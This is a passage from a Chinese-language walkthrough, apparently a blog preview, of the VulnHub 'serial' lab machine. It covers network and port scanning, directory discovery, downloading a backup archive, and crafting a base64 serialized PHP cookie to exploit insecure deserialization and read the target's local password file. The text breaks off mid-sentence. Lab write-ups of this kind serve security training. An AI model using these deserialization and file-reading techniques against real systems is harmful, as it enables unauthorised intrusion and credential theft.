文章预览
本周实践的是vulnhub的serial镜像, 下载地址,https://download.vulnhub.com/serial/serial.zip, 用workstation导入成功, 做地址扫描,sudo netdiscover -r 192.168.220.0/24, 获取到靶机地址是192.168.220.171, 接着做端口扫描,sudo nmap -sS -sV -T5 -A -p- 192.168.220.171, 发现靶机有22端口的ssh服务和80端口的http服务, 接着对http服务做路径扫描,dirb http://192.168.220.171, 发现http://192.168.220.171/index.php, 和http://192.168.220.171/backup, 浏览器访问http://192.168.220.171/backup, 下载压缩包,wget http://192.168.220.171/backup/bak.zip, 解压,unzip bak.zip,查看文件内容, 在user.class.php文件里添加内容, echo base64_encode(serialize(new User('admin'))); 执行php user.class.php,获取到编码后的Cookie, 在log.class.php文件里添加内容, 在user.class.php文件里修改内容, 再次执行执行php user.class.php,可获取到本地密码文件内容, 并更
………………………………